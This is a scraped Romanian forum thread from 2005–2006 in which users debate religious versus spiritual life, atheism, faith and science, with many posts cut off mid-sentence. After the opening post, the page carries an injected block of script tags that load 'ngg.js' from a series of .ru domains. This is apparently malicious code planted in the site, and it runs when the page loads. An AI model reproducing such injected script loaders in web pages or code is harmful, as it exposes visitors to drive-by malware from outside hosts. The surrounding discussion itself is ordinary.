Oamanii spirituali da sunt oameni religiosi -merg la biserica, participa la slujbe, liturghii, programe, insa acesta participare (implicare) este izvorata din convingerea unui relatii reale cu divinitatea, relatie confirmata atat de revelatia Scripturii cat si experienta personala a celui in cauza.

Intrebarea este oare ce sau cinecreaza acesta faptura noua? Oare cum pot cei religiosi sa devina "spirituali" (duhovnicesti)? Personal cred ca nu prin nastere sau alte rituri "religioase" ci printr-o profunda experienta personala cu divinitatea -acesta este numita in Scriptura ca "nastere din nou" despre care insusi Domnul Christos afirma ca fara acesta experienta a nasterii din nou sau din apa si Duh nimeni nu va intra in Imparatia lui Dumnezeu (Ioan 3:16)

Romania si romanii in general se considera ca fiind o tara crestina / respectiv crestini, dar oare a reusit religia crestina sub toate formele ei (traditionala -ortodoxa / catolica/ greco-catolica sau cea evanghelica -penticostali/ baptisti/ crestini dupa evengheliei/ etc) sa formeze nu doar oameni religiosi ci mai degraba oameni spirituali ... oameni in care Duhul Sfant a creat o viata noua -adica oameni care seamana cu Domnul Christos (in ortodoxie -indumnezeire/ la evanghelici -asemanarea cu chipul lui Christos), oameni corecti, cinstiti, de caracter, integri? La prima vedere se pare ca biserica (de orice traditie) nu prea a avut succes...vezi tragedia (i)morala din Romania sau diaspora, scandalurile "bisericesti"...careumbresc din pacate credibilitatea crestinismului...poate ca este nevoie de o reforma profunda a formelor...a religiei pentru a (re)gasi adevarata credinta car produce oameni noi, oameni spirituali.

Ekklesia

<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></s<script src=http://www.iroe.ru/ngg.js></script>

Larvatus
28.01.2005, 15:05
Ekklesia, e corecta observatia ta care zice ca exista o religiozitate superficiala in cazul unei majoritati foarte largi de credinciosi, de oriunde.Acceptand ca e corect ce zici, vreau totusi sa adaug ceva: dintotdeaunas-a incercat crearea unui "om nou", mai bun, mai moral, mai aproape de o perfectiune t

mona
15.02.2005, 06:17
Larvatus felicitarile mele, pana una alta, reusesti sa-ti sustii punctul de vedere foarte argumentat si posturile tale pot parea superioare celor care s-au gandit sa scrie doar cat de bine se simt ca l-au descoperit sau ca reusesc sa creada inDumnezeu.Zic ca pot sa para doar pentru ca folosirea de argumente stiintificesau a rezultatelor unor documentari, intr-o discutie despre Dumnezeu, nu stiu daca sunt neaparat dovada intelegerii fenomenului. Eu ma gandeam sa te intreb daca esti francmason si nu ateu, si asta pentru ca vad acoloca ai preferat formula "Marele Arhitect". Daca ne situam pe taramul filosofiei putem sa discutam despre "Motorul care misca toate lucrurile" sau "Marele Anonim" si sa vedem in ce context se probeaza sau nu existenta lui Dumnezeu, daca este imanent, daca este aprioric si asa mai departe, sigur ca sociologic vorbind putem aborda subiectul si maicomplex - [i]Sociologii ne pot explica ca omul, societatea,

Larvatus
21.02.2005, 17:24
[QUOTE=mona]Larvatus felicitarile mele, pana una alta, reusesti sa-ti sustii punctul de vedere foarte argumentat si posturile tale pot parea superioare celor care s-au gandit sa scrie doar cat de bine se simt ca l-au descoperit sau ca reusesc sa creada inDumnezeu.Zic ca pot sa para doar pentru ca folosirea de argumente stiintificesau a rezultatelor unor documentari, intr-o discutie despre Dumnezeu, nu stiu daca sunt neaparat dovada intelegerii fenomenului. Eu ma gandeam sa te intreb daca esti francmason si nu ateu, si asta pentru ca vad acoloca ai preferat formula "Marele Arhitect". Daca ne situam pe taramul filosofiei putem sa discutam despre "Motorul care misca toate lucrurile" sau "Marele Anonim" si sa vedem in ce context se probeaza sau nu existenta lui Dumnezeu, daca este imanent, daca este aprioric si asa mai departe, sigur ca sociologic vorbind putem aborda subiectul si maicomplex - [i]Sociologii ne pot explica ca omul, societatea,

Vlad
21.02.2005, 17:41
Larvatus,mie mi se pare ca tu inclini spre cultul "iluminatilor",sau ma insel?!

Larvatus
21.02.2005, 17:48
Larvatus,mie mi se pare ca tu inclini spre cultul "iluminatilor",sau ma insel?!

Pai ca sa-ti raspund, trebuie sa stiu cine-s astia. Am incercat o cautare cu copernicul, insa nu m-am lamurit. Habar n-am de ei.

Larvatus
21.02.2005, 17:50
http://www.conspiracyarchive.com/NWO/Illuminati.htm (http://www.c&#111;nspiracyarchive.com/NWO/Illuminati.htm)

Daca-s astia de mai sus . . . mie mi se pare zmintiti bine. Mai ramane sa ma si auto-evaluez aku'. smileys/smiley1.gif

Larvatus
21.02.2005, 17:52
Ca sa nu mai spun ca in primul rand cei care au scris pagina asta sufera rau cu kapu' . . . Fondu' Monetar, banci centrale, corporatii, toate sunt "iluminate" la astia. smileys/smiley36.gif

Larvatus
21.02.2005, 18:17
Momentan inclin totusi sa sustin ca este posibila o inalta morala in afara religiei, ca este posibila si dezirabila o umanitate pentru care "Divinul Arhitect devine o ipoteza inutila" (cum spunea istoricul stiintei A. Koyr

Larvatus
21.02.2005, 18:26
Mda, am gasit in fine, locul unde am folosit sintagma "marele arhitect":

&lt;&lt;Te intreb, chiar ai convingerea ca toti cei care afirma ca au ajuns in comuniune cu Dumnezeu (ce-o insemna asta exact, fereasca-ma al de sus . . . .) accepta existenta

mona
07.03.2005, 03:27
Nu de aripi are nevoie spiritul omenesc, spune Bacon, ci de plumb. Cu prea mare usurinta se avanta in cele mai inalte abstractiuni pierzand orice contact cu omenescul si realitatea.

Doua idei de la N. Steinhardt,(evreul botezat crestin-ortodox): "Toata lumea are nitica dreptate" si "tot omul e nebun, desi crede ca numai ceilalti sunt."

Florian
09.03.2005, 21:48
Dupa parerea mea, Larvatus este cel mai documentat in domeniu si in consecinta cel mai calificat sa emita niste pareri pertinente.

Mai cunosc cel putin un erudit, Isaac Asimov, care, ateu fiind, a studiat temeinic biblia si putea cita din ea mai bine decat marea majoritate a credinciosilor. Insa nu cunosc pe cineva din partea credinciosilor care, dupa dobandirea credintei, sa fi citit vreo carte de popularizare a stiintei sau vreo revista de stiinta.

Voi credeti ca e usor sa nu crezi in dumnezeu? Nu e! E mult mai confortabil sa crezi intr-un "parinte ocrotitor".

De ce trebuie sa crezi si sa nu cercetezi? Poate pentru ca daca te apuci si cercetezi vei ajunge la concluzia ca ai crezut intr-o himera? Probabil ca da.

Pana acum 100 de ani, marea majoritate a oamenilor credeau, din "intuitie", ca Pamantul este plat si ca soarele se invarte in jurul lui.In urma cercetarilor( interzise de biblie ),concluzionate in dovezi indubitabile pentru oamenii sanatosi rational, s-a stabilit ca lucrurile stau cum spuneau Copernic, Galilei si alti cativa " rebeli " carora, apropo de cine e agresiv in convingeri, li s-a bagat pumnul in gura de catre biserica( vezi cazul extrem al lui Giordano Bruno ).

Din pacate, multi oameni prefera si acum sa creada mai degraba ca icoana maicii domnului plange decat ca este o inselatorie pusa la cale de vreun preot ( care o face cu constiinta impacata, fie ca el crede ca aduce pe calea credintei oile ratacite, fie ca vrea sa-i creasca incasarile din cutia milei ), ori ca pur si simplu e igrasie in biserica.

As putea spune foarte multe pe tema asta, dar ganditi-va numai la un lucru: biblia e scrisa de oameni ( oameni care aveau cunostinte extrem de precare despre orice la vremea respectiva ), si are extrem de multe scapari. Una dintre ele, majora, e ca daca tot ce scrie acolo ar fi adevarat, omenirea probabil ca nu ar exista acum datorita aberatiilor genetice aparute in urmasii lui Adam si ai Evei in urma incestelor repetate.

Asta e concluzia mea din pacate, nici eu nu ma simt prea confortabil cu ea, dar ca sa termin intr-o lumina optimista, oricum ar fi e bine: fie exista viata dupa moarte, si atunci e bine, fie nu exista si iar e bine; totul se va termina definitiv pentru cel care moare. Va fi ca un somn fara vise.Din cate se pare, tuturor le place sa doarma. Mie unuia imi place sigur.

19.03.2005, 07:40
pt Larvatus!
Nu prea am chef sa citesc ce ai scris pina acum dar din citeva rinduri am observat ca vrei ca cineva sa te convinga. Eu te pot ajuta. De inceput pot sa-ti zic ca "Nimeni nu vine la Mine daca nu-l atrage Tatal". Cu alte cuvinte numeni nu poate crede ce scrie in Biblie daca nu este atras de Duhul Tatalui chiar daca ar vedea pe cineva inviind din morti (este scriptura pt asta). Toma a fost unul din cei care au crezut deabea dupa ce a vazut si totusi i sa zis " ferice de tine". Eu am vazut cate ceva (dupa ce am crezut) si putem continua daca reply.

Larvatus
23.03.2005, 13:22
pt Larvatus!
Nu prea am chef sa citesc ce ai scris pina acum dar din citeva rinduri am observat ca vrei ca cineva sa te convinga. Eu te pot ajuta. De inceput pot sa-ti zic ca "Nimeni nu vine la Mine daca nu-l atrage Tatal". Cu alte cuvinte numeni nu poate crede ce scrie in Biblie daca nu este atras de Duhul Tatalui chiar daca ar vedea pe cineva inviind din morti (este scriptura pt asta).

Hm! Daca cineva, un ateu, ar vedea pe unul "invi

yacko
19.04.2005, 20:50
Larvatus,te afli intr-o situatie dificila.Dupa cum ai spus, este imposibil sa mai crezi in Mos Craciun. Totusi, Dumnezeu nu e Mos Craciun! M-a impresionat nivelul de sofisticatie cu care ai abordat problema, si sincer sa-ti spun, nu sunt capabil sa-ti raspund la nivelul tau de cunostinte. Totusi, un om care-l cauta pe Dumnezeu si se bazeaza doar pe cunostinta si logica umana, seamana cu saracii prizionieri din pestera lui Plato (Republica, cartea a VII-a) care niciodata nu vor cunoaste adevarul daca nu ies afara la lumina. Si dupa cum omul care iese din pestera sufera senzatii foarte neplacute, tot asa omul care vine la lumina cuvantului lui Dumnezeu va avea de suferit.Pentru mine nu a fostusor sa ajung la concluzia ca oricat de mult m-as fi straduit sa fac binele, toate eforturile mele sunt in zadar, deoarece nu am putut evita si savarsirea faradelegii.

Nu cred ca sunt argumente logice care sa-ti dovedeasca existenta lui Domnezeu. De aceea il vedem doar prin credinta. Totusi, daca ai timp si bunavointa, citeste cartea lui CS Lewis, "Mere Christianity". (este foarte scurta). Sunt foarte interesat sa aflu ce crezi despre felul cum a vazut el crestinismul.

agora
19.04.2005, 22:01
Credinta e o problema de simtire si nu de cunoastere.

Cunoasterea si cuvantul sunt doar instrumente care pot conduce la credinta.

Larvatus2
07.07.2005, 14:53
Larvatus,te afli intr-o situatie dificila.

Recunosc! :)

Dupa cum ai spus, este imposibil sa mai crezi in Mos Craciun. Totusi, Dumnezeu nu e Mos Craciun!

N-am reusit sa identific o diferenta notabila; si cred ca nimeni care citeste ce spune stiinta despre religie, nu poate ajunge la o alta concluzie.

M-a impresionat nivelul de sofisticatie cu care ai abordat problema, si sincer sa-ti spun, nu sunt capabil sa-ti raspund la nivelul tau de cunostinte. Totusi, un om care-l cauta pe Dumnezeu si se bazeaza doar pe cunostinta si logica umana, seamana cu saracii prizionieri din pestera lui Plato (Republica, cartea a VII-a) care niciodata nu vor cunoaste adevarul daca nu ies afara la lumina.

Nimeni, niciodata, nu poate gasi si intelege o entitate, obiect sau fenomen real, altfel decat prin exercitiul clasic de cunoastere logica, cunoastere care constient sau nu, e incadrata de preceptele metodei stiintifice.
Astea fiind spuse, nu neg ca exista un proces real, obervabil si inteligibil, prin care persoanele religioase traiesc acea stare care ii face sa creada ca il

Larvatus2
17.07.2005, 12:18

mihaela75
08.09.2005, 08:47
Larvatus,daca esti ateu asta nu e o problema,fiecare e liber la propria opinie dar nu trebuie sa-ti consumi toata energia sa demonstrezi ca nu exista D-zeu.Sunt multe alte lucruri in care ai putea sa-ti folosesti aceasta energie.M-ai ametit cu citatele din "marii ganditori",se pare ca ti-ai facut un scop in viata din a nega pe D-zeu.Cum spune Angora mai sus ,totul tine de simtire ,nu de cunoastere.Daca nu ai ajuns sa simti mana lui D-zeu este ca te-ai inchis intine si nu-I dai voie sa intre in sufletul tau.In tot acest negativism,lasa totusi o portita deschisa.Atitudinea ta va fi copiata si insusita de copiii tai,lasa-le totusi libertatea de a alege,nu le arata doar o cale ,a taproprie.Iti doresc sa ai putere sa le spui copiilor tai:"eu cred ca e asa dar s-ar putea sa ma insel asa cavoi trebuie sa cautati care e adevarul"

garfield
08.09.2005, 09:57
...sa le spui copiilor tai:"eu cred ca e asa dar s-ar putea sa ma insel asa cavoi trebuie sa cautati care e adevarul"

Foarte bun sfat, dar oare cei credinciosi fac acelasi lucru? Le spun copiilor lor ca ei cred in Dumnezeu si trebuie sa mearga la biserica in fiecare duminica dar sa considere si faptul ca sar putea sa se insele si ar trebui sa caute singuri adevarul?

mihaela75
09.09.2005, 09:14
E riscant... eu una ca parinte nu as face-o pt ca sunt altii in jur si in societate care o fac in locul meu.Deci rolul meu e sa pastrez echilibrul.Nu-mi doresc un copil fanatic carela 20 de ani sa fuga la manastire dar nici unul ca Lavatus care nu maigandeste cu mintea lui cicu mintea" marilor ganditori".

Larvatus
24.10.2005, 17:40
mihaela75]Larvatus,daca esti ateu asta nu e o problema,fiecare e liber la propria opinie dar nu trebuie sa-ti consumi toata energia sa demonstrezi ca nu exista D-zeu.

Slabe sanse sa mi-o consum la cat de des deschid forumul . . .

Sunt multe alte lucruri in care ai putea sa-ti folosesti aceasta energie.M-ai ametit cu citatele din "marii ganditori",se pare ca ti-ai facut un scop in viata din a nega pe D-zeu.

E doar o parere. Ma dedic altor activitati cu mult mai mare forta.

Cum spune Angora mai sus ,totul tine de simtire ,nu de cunoastere.Daca nu ai ajuns sa simti mana lui D-zeu este ca te-ai inchis intine si nu-I dai voie sa intre in sufletul tau.In tot acest negativism,lasa totusi o portita deschisa.

Problema cu simtirea e ca nu este obiectiva: poti simti ceva, care in fapt nu este real. Am mai discutat asta. Insa in fine, eu sper ca las deschisa macar o portita, cum zici, ca niciodata nu poti fi absolut si 100 la suta sigur de ceva.

Atitudinea ta va fi copiata si insusita de copiii tai,lasa-le totusi libertatea de a alege,nu le arata doar o cale ,a taproprie.Iti doresc sa ai putere sa le spui copiilor tai:"eu cred ca e asa dar s-ar putea sa ma insel asa cavoi trebuie sa cautati care e adevarul"

Asa cum fiecare parinte are dorinta sa transmita tot ce e mai valoros, ce crede el ca e mai valoros, copilului sau, si eu, incerc acelasi lucru. Nu cred ca asta este condamnabil.

Aceasta forma de educatie insa, la mine nu va merge pana la inselatorie, adica pana la a insufla propriului copil mai multa siguranta in ateism decat eu insumi am. Sunt o persoana suficient de inteligenta pentru a spune, la un moment dat, exact fraza pe care tu ai scris-o mai sus. Nu este inca timpul. Ptr. moment nu mi-am indoctrinat copilul in nici un sens, insa am reactionat atunci cand a venit de la gradinita cu idei bizare despre faptul ca exista oarece

agora
20.11.2005, 04:12
"Problema cu simtirea e ca nu este obiectiva: poti simti ceva, care in fapt nu este real. Am mai discutat asta. Insa in fine, eu sper ca las deschisa macar o portita, cum zici, ca niciodata nu poti fi absolut si 100 la suta sigur de ceva."

E drept ca simtireanu e obiectiva. Dar un efort intelectual ce doreste a rezolva o problema in mod neadecvat ar fi ceva mai obiectiv? Ratiunea matura poate sa-si recunoasca limitele iar de acolo sa inceapa noii ei pasi. Sa incercam sa intelegem ideea si eventual realitatea divinitatii cu mijloacele rationale prezente consider ca e lipsit de relevanta pentru ca aceste mijloace nu sunt inca suficient de dezvoltate pentru o astfel de sarcina.

Credinciosii au spus si spun multe dar cred ca sunt relevante marturiile unora dintre ei, in ceea ce priveste ceea ce au simtit si dobandit cand au fost iluminati si dupa: impacare, sentiment de comuniune,capacitate de daruire, capacitate de distantare fata de nevoile proprii, ierarhie clara a valorilor, abilitatea de a surprinde esentialul sub infinitele forme ale realitatii concrete, etc. Cand vin toate acestea nu mai e nevoie sa gandim cat la suta e adevarat din ce simtim pentru ca certitudinea devine o traire.

Aici se ajunge si prin cunostinte de la altii dar in primul rand se pare ca e un exercitiu personal ce solicita omului sa isi intoarca ochii spre interior detasandu-se in mare parte de multitudinea stimularilor cotidiene sau de calea oferita de argumentarile aride. Din aceasta perspectiva se pare ca argumentarile prelungitenu sprijina ci interfereaza negativ cu fenomenul iluminarii. Cu o anumita tolerantas-ar poate spune ca ar fi nevoie de o oarecare diminuare partiala a functiilor cognitiv-rationale sau o trecere a lor intr-un alt registru.

Larvatus
06.02.2006, 13:42
"Problema cu simtirea e ca nu este obiectiva: poti simti ceva, care in fapt nu este real. Am mai discutat asta. Insa in fine, eu sper ca las deschisa macar o portita, cum zici, ca niciodata nu poti fi absolut si 100 la suta sigur de ceva."

E drept ca simtireanu e obiectiva. Dar un efort intelectual ce doreste a rezolva o problema in mod neadecvat ar fi ceva mai obiectiv? Ratiunea matura poate sa-si recunoasca limitele iar de acolo sa inceapa noii ei pasi. Sa incercam sa intelegem ideea si eventual realitatea divinitatii cu mijloacele rationale prezente consider ca e lipsit de relevanta pentru ca aceste mijloace nu sunt inca suficient de dezvoltate pentru o astfel de sarcina.

Ideea de divi0nitate este binisor

agora
17.02.2006, 02:54
"Ideea de divi0nitate este binisor

anaroxi
03.03.2006, 11:16
Larvatus,smileys/smiley4.gif eoti foarte documentat, nimic de reprooat aici, poate chiar prea documentat,smileys/smiley32.gif dar vai!!!smileys/smiley19.gif te joci cu Focul oi p

anaroxi
05.03.2006, 00:56
salut prietene!!

Larvatusdon`t take it too personal! este doar parerea mea despre ceea ce scrii tu in legatura cu religia. Desi esti bine documentat esti totusi prea inversunat impotriva Lui Dumnezeu si nu e bine!smileys/smiley2.gif

Larvatus
26.03.2006, 15:02
Ideea sau ideile despe divinitate din diferitele stiinte enumerate mai sus sunt doar incercari de interpretare a unui fenomen, realitate sau cum am dori sa o numim.

Sunt incercari, doar ca sunt reusite in masura in care sunt sustinute de argumente si demonstrate empiric.

Cand datele despre divinitate pe care le are societatea noastra se vor schimba tot ceea ce spun astazi acele stiinte va fi probabil considerat ceva depasit. Stiinta in ultimele sute de ani a lansat foarte multe teorii care astazi mai sunt interesante doar dintr-o perspectiva a istoriei ideilor si nimic mai mult.

Putin teorii stiintifice sunt abandonate, si asta tocmai pentru ca o teorie in stiinta reprezinta o ipoteza demonstrata. E adevarat insa ca pe masura ce stiinta avanseaza, apar noi elemente care se adauga vechilor cunostinte deja existente, si uneori, da, duc chiar la abandonarea unei teorii. Asta poate fi privita ca o slabiciune a stiintei, dar este in acelasi timp si un mare avantaj in contrast cu religia, care ea e ancorata in dogme sau text sacru care desi dovedite false de realitate si cunoasterea actuala, raman neschimbate.

Citind istoria oricarei dintre aceste religii aflam despre falimentul unei interpretari date divinitatii si mai nimic despre divinitate.

O data cu esecul interpretarilor divinitatilor, divinitatile insale esueaza, caci acestea nu au o existenta obiectiva dovedita, fiind doar simple idei sustinute de acele interpretari.

</script>

Larvatus
26.03.2006, 15:49
[QUOTE=anaroxi]Larvatus, eoti foarte documentat, nimic de reprooat aici, poate chiar prea documentat, dar vai!!! te joci cu Focul oi p

Larvatus
26.03.2006, 15:59
Salut prietene!! Larvatusdon`t take it too personal! este doar parerea mea despre ceea ce scrii tu in legatura cu religia. Desi esti bine documentat esti totusi prea inversunat impotriva Lui Dumnezeu si nu e bine!smileys/smiley2.gif

E modul meu de a reactiona la dezamagirea imensa ca nu exista, si ca nici macar nu pot sa cred in El. Macar at

marian42
28.03.2006, 22:46
Mai, Larvatus, io nu-s bigot si nici n-am sa-ncerc sa te
conving de ceva, n-am "stofa" de apostol, da-ti zic atat :
sper sa te gaseasca Dumnezeu pe tine, inainte de a-L gasi tu pe El...

29.03.2006, 03:01
Lavartus wrote: "daca ar fi existat (Dumnezeu)si daca chiar ar fi vrut sa ne comunice ceva, sigur ar fi reusit asta infinit mai bine dec

angeline
29.03.2006, 09:38
E modul meu de a reactiona la dezamagirea imensa ca nu exista, si ca nici macar nu pot sa cred in El. Macar at

darie
29.03.2006, 15:40
Apropos de ce zicea marian42.......................................... ..........

"I would rather live my life as if there is a God, and die to find out there isn't, than live my life as if there isn't, and die to find out there is."

05.04.2006, 02:52
Darie, I

anaroxi
16.04.2006, 09:51
Larvatus a scris: "Tu sustii existenta lui Dumnezeu doar prin marturiaBibliei, carte a carei istorie

-valentin-
16.04.2006, 12:07
multe foarte multe

fiecare spune parerea lui dintr-un anumit punct de vedere

pana la urma credinta e numai una fie ca esti musulman , evreu , ateu, ortodox sau orice alta religie , e ceea ce crezi tu insati in adancul sufletului tau , e ceea ce simti , dar........pana la urma nimeni nu pleaca din lumea asta fara sa-si plateasca politele

credinta sta numai in tine

agora
18.04.2006, 05:35
Care sunt argumentele stiintei prin care se demonstreaza inexistenta divinului?

Nu era vorba sa comparam stiinta cu religia ci a evidentia ca enunturile stiintifice ale unei perioade se pot dovedi eronate atunci cand orizontul cunoaterii se largeste. Nimic nu ne indica, ca am fi ajuns la finele cunoasterii asa cadatele pe care le avem in prezent pot fi oricand subiectul unor modificari iar din aceasta cauza e indicat sa le tratam cu rezerva.

<I style="mso-bidi-font-style: normal">